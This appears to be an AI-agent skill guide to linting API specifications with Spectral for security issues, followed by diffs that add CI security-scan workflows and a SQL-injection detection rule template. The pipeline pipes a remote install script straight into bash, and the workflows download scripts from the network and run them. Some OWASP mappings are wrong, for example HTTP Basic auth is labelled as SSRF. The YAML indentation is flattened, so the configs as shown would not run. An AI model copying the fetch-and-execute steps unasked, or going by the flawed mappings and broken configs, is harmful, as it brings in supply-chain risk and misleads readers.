AsyncAPI v2.x, and Arazzo v1.0, Spectral helps identify security vulnerabilities, design flaws,
and compliance issues during the API design phase—before code is written. Custom rulesets enable
enforcement of OWASP API Security Top 10 patterns, authentication standards, and data protection
requirements across your entire API portfolio.
## Quick Start
### Installation
```bash
# Install via npm
npm install -g @stoplight/spectral-cli
# Or using Yarn
yarn global add @stoplight/spectral-cli
# Or using Docker
docker pull stoplight/spectral
# Verify installation
spectral --version
```
### Basic API Specification Linting
```bash
# Lint OpenAPI specification with built-in rules
spectral lint openapi.yaml
# Lint with specific ruleset
spectral lint openapi.yaml --ruleset .spectral.yaml
# Output as JSON for CI/CD integration
spectral lint openapi.yaml --format json --output results.json
```
### Quick Security Scan
```bash
# Create security-focused ruleset
echo 'extends: ["spectral:oas"]' > .spectral.yaml
# Lint API specification
spectral lint api-spec.yaml --ruleset .spectral.yaml
```
## Core Workflow
### Workflow Checklist
Progress:
[ ] 1. Install Spectral and select appropriate base rulesets
[ ] 2. Create or configure ruleset with security rules
[ ] 3. Identify API specifications to validate (OpenAPI, AsyncAPI, Arazzo)
[ ] 4. Run linting with appropriate severity thresholds
[ ] 5. Review findings and categorize by security impact
[ ] 6. Map findings to OWASP API Security Top 10
[ ] 7. Create custom rules for organization-specific security patterns
[ ] 8. Integrate into CI/CD pipeline with failure thresholds
[ ] 9. Generate reports with remediation guidance
[ ] 10. Establish continuous validation process
Work through each step systematically. Check off completed items.
### Step 1: Ruleset Configuration
Create a `.spectral.yaml` ruleset extending built-in security rules:
```yaml
# .spectral.yaml - Basic security-focused ruleset
extends: ["spectral:oas", "spectral:asyncapi"]
rules:
# Enforce HTTPS for all API endpoints
oas3-valid-schema-example: true
oas3-server-not-example.com: true
# Authentication security
operation-security-defined: error
# Information disclosure prevention
info-contact: warn
info-description: warn
```
**Built-in Rulesets:**
- `spectral:oas` - OpenAPI v2/v3.x security and best practices
- `spectral:asyncapi` - AsyncAPI v2.x validation rules
- `spectral:arazzo` - Arazzo v1.0 workflow specifications
**Ruleset Selection Best Practices:**
- Start with built-in rulesets and progressively add custom rules
- Use `error` severity for critical security issues (authentication, HTTPS)
- Use `warn` for recommended practices and information disclosure risks
- Use `info` for style guide compliance and documentation completeness
For advanced ruleset patterns, see `references/ruleset_patterns.md`.
### Step 2: Security-Focused API Linting
Run Spectral with security-specific validation:
```bash
# Comprehensive security scan
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--format stylish \
--verbose
# Focus on error-level findings only (critical security issues)
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--fail-severity error
# Scan multiple specifications
spectral lint api-specs/*.yaml --ruleset .spectral.yaml
# Generate JSON report for further analysis
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--format json \
--output security-findings.json
```
**Output Formats:**
- `stylish` - Human-readable terminal output (default)
- `json` - Machine-readable JSON for CI/CD integration
- `junit` - JUnit XML for test reporting platforms
- `html` - HTML report (requires additional plugins)
- `github-actions` - GitHub Actions annotations format
### Step 3: OWASP API Security Validation
Validate API specifications against OWASP API Security Top 10:
```yaml
# .spectral-owasp.yaml - OWASP API Security focused rules
extends: ["spectral:oas"]
rules:
# API1:2023 - Broken Object Level Authorization
operation-security-defined:
severity: error
message: "All operations must have security defined (OWASP API1)"
# API2:2023 - Broken Authentication
security-schemes-defined:
severity: error
message: "API must define security schemes (OWASP API2)"
# API3:2023 - Broken Object Property Level Authorization
no-additional-properties:
severity: warn
message: "Consider disabling additionalProperties to prevent data leakage (OWASP API3)"
# API5:2023 - Broken Function Level Authorization
operation-tag-defined:
severity: warn
message: "Operations should be tagged for authorization policy mapping (OWASP API5)"
# API7:2023 - Server Side Request Forgery
no-http-basic:
severity: error
message: "HTTP Basic auth transmits credentials in plain text (OWASP API7)"
# API8:2023 - Security Misconfiguration
servers-use-https:
description: All server URLs must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URL must use HTTPS (OWASP API8)"
# API9:2023 - Improper Inventory Management
api-version-required:
severity: error
given: $.info
then:
field: version
function: truthy
message: "API version must be specified (OWASP API9)"
```
**Run OWASP-focused validation:**
```bash
spectral lint openapi.yaml --ruleset .spectral-owasp.yaml
```
For complete OWASP API Security Top 10 rule mappings, see `references/owasp_api_mappings.md`.
### Step 4: Custom Security Rule Development
Create organization-specific security rules using Spectral's rule engine:
```yaml
# .spectral-custom.yaml
extends: ["spectral:oas"]
rules:
# Require API key authentication
require-api-key-auth:
description: All APIs must support API key authentication
severity: error
given: $.components.securitySchemes[*]
then:
field: type
function: enumeration
functionOptions:
values: [apiKey, oauth2, openIdConnect]
message: "API must define apiKey, OAuth2, or OpenID Connect security"
# Prevent PII in query parameters
no-pii-in-query:
description: Prevent PII exposure in URL query parameters
severity: error
given: $.paths[*][*].parameters[?(@.in == 'query')].name
then:
function: pattern
functionOptions:
notMatch: "(ssn|social.?security|credit.?card|password|secret|token)"
message: "Query parameters must not contain PII identifiers"
# Require rate limiting headers
require-rate-limit-headers:
description: API responses should include rate limit headers
severity: warn
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
properties:
X-RateLimit-Limit: true
X-RateLimit-Remaining: true
message: "Consider adding rate limit headers for security"
# Enforce consistent error responses
error-response-format:
description: Error responses must follow standard format
severity: error
given: $.paths[*][*].responses[?(@property >= 400)].content.application/json.schema
then:
function: schema
functionOptions:
schema:
type: object
required: [error, message]
properties:
error:
type: string
message:
type: string
message: "Error responses must include 'error' and 'message' fields"
```
**Custom Rule Development Resources:**
- `references/custom_rules_guide.md` - Complete rule authoring guide with functions
- `references/custom_functions.md` - Creating custom JavaScript/TypeScript functions
- `assets/rule-templates/` - Reusable rule templates for common security patterns
### Step 5: CI/CD Pipeline Integration
Integrate Spectral into continuous integration workflows:
**GitHub Actions:**
```yaml
# .github/workflows/api-security-lint.yml
name: API Security Linting
on: [push, pull_request]
jobs:
spectral:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Setup Node.js
uses: actions/setup-node@v3
with:
node-version: '18'
- name: Install Spectral
run: npm install -g @stoplight/spectral-cli
- name: Lint API Specifications
run: |
spectral lint api-specs/*.yaml \
--ruleset .spectral.yaml \
--format github-actions \
--fail-severity error
- name: Generate Report
if: always()
run: |
spectral lint api-specs/*.yaml \
--ruleset .spectral.yaml \
--format json \
--output spectral-report.json
- name: Upload Report
if: always()
uses: actions/upload-artifact@v3
with:
name: spectral-security-report
path: spectral-report.json
```
**GitLab CI:**
```yaml
# .gitlab-ci.yml
api-security-lint:
stage: test
image: node:18
script:
- npm install -g @stoplight/spectral-cli
- spectral lint api-specs/*.yaml --ruleset .spectral.yaml --fail-severity error
artifacts:
when: always
reports:
junit: spectral-report.xml
```
**Docker-Based Pipeline:**
```bash
# Run in CI/CD with Docker
docker run --rm \
-v $(pwd):/work \
stoplight/spectral lint /work/openapi.yaml \
--ruleset /work/.spectral.yaml \
--format json \
--output /work/results.json
# Fail build on critical security issues
if jq -e '.[] | select(.severity == 0)' results.json > /dev/null; then
echo "Critical security issues detected!"
exit 1
fi
```
For complete CI/CD integration examples, see `scripts/ci_integration_examples/`.
### Step 6: Results Analysis and Remediation
Analyze findings and provide security remediation:
```bash
# Parse Spectral JSON output for security report
python3 scripts/parse_spectral_results.py \
--input spectral-report.json \
--output security-report.html \
--map-owasp \
--severity-threshold error
# Generate remediation guidance
python3 scripts/generate_remediation.py \
--input spectral-report.json \
--output remediation-guide.md
```
**Validation Workflow:**
1. Review all error-level findings (critical security issues)
2. Verify each finding in API specification context
3. Map findings to OWASP API Security Top 10 categories
4. Prioritize by severity and exploitability
5. Apply fixes to API specifications
6. Re-lint to verify remediation
7. Document security decisions and exceptions
**Feedback Loop Pattern:**
```bash
# 1. Initial lint
spectral lint openapi.yaml --ruleset .spectral.yaml -o scan1.json
# 2. Apply security fixes to API specification
# 3. Re-lint to verify fixes
spectral lint openapi.yaml --ruleset .spectral.yaml -o scan2.json
# 4. Compare results
python3 scripts/compare_spectral_results.py scan1.json scan2.json
```
## Advanced Patterns
### Pattern 1: Multi-Specification Governance
Enforce consistent security standards across API portfolio:
```bash
# Scan all API specifications with organization ruleset
find api-specs/ -name "*.yaml" -o -name "*.json" | while read spec; do
echo "Linting: $spec"
spectral lint "$spec" \
--ruleset .spectral-org-standards.yaml \
--format json \
--output "reports/$(basename $spec .yaml)-report.json"
done
# Aggregate findings across portfolio
python3 scripts/aggregate_api_findings.py \
--input-dir reports/ \
--output portfolio-security-report.html
```
### Pattern 2: Progressive Severity Enforcement
Start with warnings and progressively enforce stricter rules:
```yaml
# .spectral-phase1.yaml - Initial rollout (warnings only)
extends: ["spectral:oas"]
rules:
servers-use-https: warn
operation-security-defined: warn
# .spectral-phase2.yaml - Enforcement phase (errors)
extends: ["spectral:oas"]
rules:
servers-use-https: error
operation-security-defined: error
```
```bash
# Phase 1: Awareness (don't fail builds)
spectral lint openapi.yaml --ruleset .spectral-phase1.yaml
# Phase 2: Enforcement (fail on violations)
spectral lint openapi.yaml --ruleset .spectral-phase2.yaml --fail-severity error
```
### Pattern 3: API Security Pre-Commit Validation
Prevent insecure API specifications from being committed:
```bash
# .git/hooks/pre-commit
#!/bin/bash
# Find staged API specification files
SPECS=$(git diff --cached --name-only --diff-filter=ACM | grep -E '\.(yaml|yml|json)$' | grep -E '(openapi|swagger|api)')
if [ -n "$SPECS" ]; then
echo "Validating API specifications..."
for spec in $SPECS; do
spectral lint "$spec" --ruleset .spectral.yaml --fail-severity error
if [ $? -ne 0 ]; then
echo "Security validation failed for $spec"
exit 1
fi
done
fi
```
### Pattern 4: Automated Security Review Comments
Generate security review comments for pull requests:
```bash
# Generate PR review comments from Spectral findings
spectral lint openapi.yaml \
--ruleset .spectral.yaml \
--format json | \
python3 scripts/generate_pr_comments.py \
--file openapi.yaml \
--severity error,warn \
--output pr-comments.json
# Post to GitHub PR via gh CLI
gh pr comment $PR_NUMBER --body-file pr-comments.json
```
## Custom Functions for Advanced Security Rules
Create custom JavaScript functions for complex security validation:
```javascript
// spectral-functions/check-jwt-expiry.js
export default (targetVal, opts) => {
// Validate JWT security scheme includes expiration
if (targetVal.type === 'http' && targetVal.scheme === 'bearer') {
if (!targetVal.bearerFormat || targetVal.bearerFormat !== 'JWT') {
return [{
message: 'Bearer authentication should specify JWT format'
}];
}
}
return [];
};
```
```yaml
# .spectral.yaml with custom function
functions:
- check-jwt-expiry
functionsDir: ./spectral-functions
rules:
jwt-security-check:
description: Validate JWT security configuration
severity: error
given: $.components.securitySchemes[*]
then:
function: check-jwt-expiry
```
For complete custom function development guide, see `references/custom_functions.md`.
## Automation & Continuous Validation
### Scheduled API Security Scanning
```bash
# Automated daily API specification scanning
./scripts/spectral_scheduler.sh \
--schedule daily \
--specs-dir api-specs/ \
--ruleset .spectral-owasp.yaml \
--output-dir scan-results/ \
--alert-on error \
--slack-webhook $SLACK_WEBHOOK
```
### API Specification Monitoring
```bash
# Monitor API specifications for security regressions
./scripts/spectral_monitor.sh \
--baseline baseline-scan.json \
--current-scan latest-scan.json \
--alert-on-new-findings \
--email security-team@example.com
```
## Security Considerations
- **Specification Security**: API specifications may contain sensitive information (internal URLs, authentication schemes) - control access and sanitize before sharing
- **Rule Integrity**: Protect ruleset files from unauthorized modification - store in version control with code review requirements
- **False Positives**: Manually review findings before making security claims - context matters for API design decisions
- **Specification Versioning**: Maintain version history of API specifications to track security improvements over time
- **Secrets in Specs**: Never include actual credentials, API keys, or secrets in example values - use placeholder values only
- **Compliance Mapping**: Document how Spectral rules map to compliance requirements (PCI-DSS, GDPR, HIPAA)
- **Governance Enforcement**: Define exception process for legitimate rule violations with security team approval
- **Audit Logging**: Log all Spectral scans, findings, and remediation actions for security auditing
- **Access Control**: Restrict modification of security rulesets to designated API security team members
- **Continuous Validation**: Re-validate API specifications whenever they change or when new security rules are added
## Bundled Resources
### Scripts (`scripts/`)
- `parse_spectral_results.py` - Parse Spectral JSON output and generate security reports with OWASP mapping
- `generate_remediation.py` - Generate remediation guidance based on Spectral findings
- `compare_spectral_results.py` - Compare two Spectral scans to track remediation progress
- `aggregate_api_findings.py` - Aggregate findings across multiple API specifications
- `spectral_ci.sh` - CI/CD integration wrapper with exit code handling
- `spectral_scheduler.sh` - Scheduled scanning with alerting
- `spectral_monitor.sh` - Continuous monitoring with baseline comparison
- `generate_pr_comments.py` - Convert Spectral findings to PR review comments
### References (`references/`)
- `owasp_api_mappings.md` - Complete OWASP API Security Top 10 rule mappings
- `custom_rules_guide.md` - Custom rule authoring with examples
- `custom_functions.md` - Creating custom JavaScript/TypeScript validation functions
- `ruleset_patterns.md` - Reusable ruleset patterns for common security scenarios
- `api_security_checklist.md` - API security validation checklist
### Assets (`assets/`)
- `spectral-owasp.yaml` - Comprehensive OWASP API Security Top 10 ruleset
- `spectral-org-template.yaml` - Organization-wide API security standards template
- `github-actions-template.yml` - Complete GitHub Actions workflow
- `gitlab-ci-template.yml` - GitLab CI integration template
- `rule-templates/` - Reusable security rule templates
## Common Patterns
### Pattern 1: Security-First API Design Validation
Validate API specifications during design phase:
```bash
# Design phase validation (strict security rules)
spectral lint api-design.yaml \
--ruleset .spectral-owasp.yaml \
--fail-severity warn \
--verbose
```
### Pattern 2: API Specification Diff Analysis
Detect security regressions between API versions:
```bash
# Compare two API specification versions
spectral lint api-v2.yaml --ruleset .spectral.yaml -o v2-findings.json
spectral lint api-v1.yaml --ruleset .spectral.yaml -o v1-findings.json
python3 scripts/compare_spectral_results.py \
--baseline v1-findings.json \
--current v2-findings.json \
--show-regressions
```
### Pattern 3: Multi-Environment API Security
Different rulesets for development, staging, production:
```yaml
# .spectral-dev.yaml (permissive)
extends: ["spectral:oas"]
rules:
servers-use-https: warn
# .spectral-prod.yaml (strict)
extends: ["spectral:oas"]
rules:
servers-use-https: error
operation-security-defined: error
```
## Integration Points
- **CI/CD**: GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps
- **API Gateways**: Kong, Apigee, AWS API Gateway (validate specs before deployment)
- **IDE Integration**: VS Code extension, JetBrains plugins for real-time validation
- **API Documentation**: Stoplight Studio, Swagger UI, Redoc
- **Issue Tracking**: Jira, GitHub Issues, Linear (automated ticket creation for findings)
- **API Governance**: Backstage, API catalogs (enforce standards across portfolios)
- **Security Platforms**: Defect Dojo, SIEM platforms (via JSON export)
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
- Start with `error` severity only: `spectral lint --fail-severity error`
- Progressively add rules and adjust severity levels
- Use `overrides` section in ruleset to exclude specific paths
- See `references/ruleset_patterns.md` for filtering strategies
### Issue: Custom Rules Not Working
**Solution**:
- Verify JSONPath expressions using online JSONPath testers
- Check rule syntax with `spectral lint --ruleset .spectral.yaml --verbose`
- Use `--verbose` flag to see which rules are being applied
- Test rules in isolation before combining them
### Issue: Performance Issues with Large Specifications
**Solution**:
- Lint specific paths only: `spectral lint api-spec.yaml --ignore-paths "components/examples"`
- Use `--skip-rules` to disable expensive rules temporarily
- Split large specifications into smaller modules
- Run Spectral in parallel for multiple specifications
### Issue: CI/CD Integration Failing
**Solution**:
- Check Node.js version compatibility (requires Node 14+)
- Verify ruleset path is correct relative to specification file
- Use `--fail-severity` to control when builds should fail
- Review exit codes in `scripts/spectral_ci.sh`
## References
- [Spectral Documentation](https://docs.stoplight.io/docs/spectral/674b27b261c3c-overview)
- [Spectral GitHub Repository](https://github.com/stoplightio/spectral)
- [OWASP API Security Top 10](https://owasp.org/API-Security/editions/2023/en/0x11-t10/)
- [OpenAPI Specification](https://spec.openapis.org/oas/latest.html)
- [AsyncAPI Specification](https://www.asyncapi.com/docs/reference/specification/latest)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,189 @@
# GitHub Actions Workflow for Spectral API Security Linting
# This workflow validates OpenAPI/AsyncAPI specifications against security best practices
name: API Security Linting with Spectral
on:
push:
branches: [main, develop]
paths:
- 'api-specs/**/*.yaml'
- 'api-specs/**/*.yml'
- 'api-specs/**/*.json'
- '.spectral.yaml'
pull_request:
branches: [main, develop]
paths:
- 'api-specs/**/*.yaml'
- 'api-specs/**/*.yml'
- 'api-specs/**/*.json'
- '.spectral.yaml'
jobs:
spectral-lint:
name: Lint API Specifications
runs-on: ubuntu-latest
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Setup Node.js
uses: actions/setup-node@v4
with:
node-version: '20'
cache: 'npm'
- name: Install Spectral CLI
run: npm install -g @stoplight/spectral-cli
- name: Verify Spectral Installation
run: spectral --version
- name: Lint API Specifications (GitHub Actions Format)
run: |
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset .spectral.yaml \
--format github-actions \
--fail-severity error
continue-on-error: true
- name: Generate JSON Report
if: always()
run: |
mkdir -p reports
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset .spectral.yaml \
--format json \
--output reports/spectral-results.json || true
- name: Generate HTML Report
if: always()
run: |
# Download parse script if not in repository
if [ ! -f "scripts/parse_spectral_results.py" ]; then
curl -o scripts/parse_spectral_results.py \
https://raw.githubusercontent.com/SecOpsAgentKit/skills/main/appsec/api-spectral/scripts/parse_spectral_results.py
chmod +x scripts/parse_spectral_results.py
fi
python3 scripts/parse_spectral_results.py \
--input reports/spectral-results.json \
--output reports/spectral-report.html \
--format html \
--map-owasp
- name: Upload Spectral Reports
if: always()
uses: actions/upload-artifact@v4
with:
name: spectral-security-reports
path: reports/
retention-days: 30
- name: Check for Critical Issues
run: |
if [ -f "reports/spectral-results.json" ]; then
CRITICAL_COUNT=$(jq '[.[] | select(.severity == 0)] | length' reports/spectral-results.json)
echo "Critical security issues found: $CRITICAL_COUNT"
if [ "$CRITICAL_COUNT" -gt 0 ]; then
echo "::error::Found $CRITICAL_COUNT critical security issues in API specifications"
exit 1
fi
fi
- name: Comment PR with Results
if: github.event_name == 'pull_request' && always()
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
if (fs.existsSync('reports/spectral-results.json')) {
const results = JSON.parse(fs.readFileSync('reports/spectral-results.json', 'utf8'));
const severityCounts = results.reduce((acc, finding) => {
const severity = ['error', 'warn', 'info', 'hint'][finding.severity] || 'unknown';
acc[severity] = (acc[severity] || 0) + 1;
return acc;
}, {});
const errorCount = severityCounts.error || 0;
const warnCount = severityCounts.warn || 0;
const infoCount = severityCounts.info || 0;
const summary = `## 🔒 API Security Lint Results
**Total Findings:** ${results.length}
| Severity | Count |
|----------|-------|
| 🔴 Error | ${errorCount} |
| 🟡 Warning | ${warnCount} |
| 🔵 Info | ${infoCount} |
${errorCount > 0 ? '⚠️ **Action Required:** Fix error-level security issues before merging.' : '✅ No critical security issues found.'}
📄 [View Detailed Report](../actions/runs/${context.runId})
`;
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: summary
});
}
# Optional: Separate job for OWASP-specific validation
owasp-validation:
name: OWASP API Security Validation
runs-on: ubuntu-latest
needs: spectral-lint
steps:
- name: Checkout Repository
uses: actions/checkout@v4
- name: Setup Node.js
uses: actions/setup-node@v4
with:
node-version: '20'
- name: Install Spectral CLI
run: npm install -g @stoplight/spectral-cli
- name: Validate Against OWASP Ruleset
run: |
# Use OWASP-specific ruleset if available
if [ -f ".spectral-owasp.yaml" ]; then
RULESET=".spectral-owasp.yaml"
else
# Download OWASP ruleset template
curl -o .spectral-owasp.yaml \
https://raw.githubusercontent.com/SecOpsAgentKit/skills/main/appsec/api-spectral/assets/spectral-owasp.yaml
RULESET=".spectral-owasp.yaml"
fi
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset "$RULESET" \
--format stylish \
--fail-severity warn
- name: Generate OWASP Compliance Report
if: always()
run: |
mkdir -p reports
spectral lint api-specs/**/*.{yaml,yml,json} \
--ruleset .spectral-owasp.yaml \
--format json \
--output reports/owasp-validation.json || true
- name: Upload OWASP Report
if: always()
uses: actions/upload-artifact@v4
with:
name: owasp-compliance-report
path: reports/owasp-validation.json
retention-days: 30

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
